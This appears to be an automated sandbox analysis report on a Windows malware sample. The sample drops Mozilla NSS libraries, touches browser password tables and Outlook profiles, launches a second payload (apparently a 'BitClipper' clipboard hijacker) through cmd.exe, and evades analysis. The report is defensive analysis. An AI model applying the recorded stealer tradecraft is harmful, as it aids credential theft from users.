Source: YEnIrzZUUw.exe, 00000000.00000002.2265884130.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2257348978.000000001E639000.00000004.00000020.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2266689058.000000006CB1F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: YEnIrzZUUw.exe, 00000000.00000002.2265884130.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2257348978.000000001E639000.00000004.00000020.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2266689058.000000006CB1F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: YEnIrzZUUw.exe, YEnIrzZUUw.exe, 00000000.00000002.2265884130.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2257348978.000000001E639000.00000004.00000020.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2266689058.000000006CB1F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: YEnIrzZUUw.exe, 00000000.00000002.2265884130.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2257348978.000000001E639000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: YEnIrzZUUw.exe, 00000000.00000002.2265884130.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2257348978.000000001E639000.00000004.00000020.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2266689058.000000006CB1F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: YEnIrzZUUw.exe, 00000000.00000003.1766416230.00000000245B4000.00000004.00000020.00020000.00000000.sdmp, AEBKKECBGIIJJKECGIJE.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: YEnIrzZUUw.exe, 00000000.00000002.2265884130.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2257348978.000000001E639000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: YEnIrzZUUw.exe, 00000000.00000002.2265884130.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2257348978.000000001E639000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: YEnIrzZUUw.exe ReversingLabs: Detection: 55%
Source: YEnIrzZUUw.exe Virustotal: Detection: 59%
Source: unknown Process created: C:\Users\user\Desktop\YEnIrzZUUw.exe "C:\Users\user\Desktop\YEnIrzZUUw.exe"
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe "C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe"
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2204
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe "C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe" Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: YEnIrzZUUw.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: YEnIrzZUUw.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: YEnIrzZUUw.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: YEnIrzZUUw.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: YEnIrzZUUw.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: YEnIrzZUUw.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: YEnIrzZUUw.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: YEnIrzZUUw.exe, 00000000.00000002.2266334227.000000006C95D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: YEnIrzZUUw.exe, 00000000.00000002.2266689058.000000006CB1F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: C:\vivuxaju.pdb source: YEnIrzZUUw.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: YEnIrzZUUw.exe, 00000000.00000002.2266689058.000000006CB1F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: YEnIrzZUUw.exe, 00000000.00000002.2266334227.000000006C95D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: IDBAKKECAE.exe, 00000007.00000000.2130873887.000000000059C000.00000002.00000001.01000000.00000009.sdmp, IDBAKKECAE.exe, 00000007.00000002.4164416328.000000000059C000.00000002.00000001.01000000.00000009.sdmp, tiktok[1].exe.0.dr, IDBAKKECAE.exe.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: YEnIrzZUUw.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: YEnIrzZUUw.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: YEnIrzZUUw.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: YEnIrzZUUw.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: YEnIrzZUUw.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Unpacked PE file: 0.2.YEnIrzZUUw.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Unpacked PE file: 0.2.YEnIrzZUUw.exe.400000.0.unpack
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_004176C5 push ecx; ret 0_2_004176D8
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C91B536 push ecx; ret 0_2_6C91B549
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00588856 push ecx; ret 7_2_00588869
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_0058834B push ecx; ret 7_2_0058835E
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Window / User API: threadDelayed 763 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Window / User API: threadDelayed 9235 Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
